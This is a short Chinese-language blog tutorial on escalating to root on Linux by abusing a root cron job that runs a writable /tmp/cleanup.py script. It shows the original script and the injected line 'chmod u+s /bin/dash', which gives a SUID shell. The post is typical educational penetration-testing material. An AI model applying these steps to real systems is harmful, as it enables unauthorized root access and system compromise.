提权教程:LINUX CRON JOBS 提权

Admin 2020-07-07 123人围观 ,发现1个评论 提权教程

Cron Jobs 计划任务通过 /etc/crontab 文件,可以设定系统定期执行的任务。

crontab 文件只能是root权限 进行编辑

我们得到一个非root权限的远程登录用户的时候

查看/etc/crontab 内容文件

 

发现存在

提权教程:LINUX CRON JOBS 提权 Web安全 第1张


每两分钟执行一次文件

找到 /tmp/cleanup.py

 

cat /tmp/cleanup.py

 

提权教程:LINUX CRON JOBS 提权 Web安全 第2张

#!/usr/bin/env python

import os

import sys

try:

       os.system('rm -r  /home/moonteam/cleanup/*')

except:

    sys.exit()


两分钟执行一次文件 删除cleanup目录下全部文件

 

提权教程:LINUX CRON JOBS 提权 Web安全 第3张

查看权限

ls -al


修改内容

os.system('chmod u+s /bin/dash')

 

提权教程:LINUX CRON JOBS 提权 Web安全 第4张把 /bin/dash设置SUID权限  运行之后就会得到 root权限

使用命令dash

提权教程:LINUX CRON JOBS 提权 Web安全 第5张

已有1条评论
  • 2020-07-07 22:12:50

    学习下 哈哈 人好少

请关注微信公众号
微信二维码
不容错过
Powered By 蚁人博客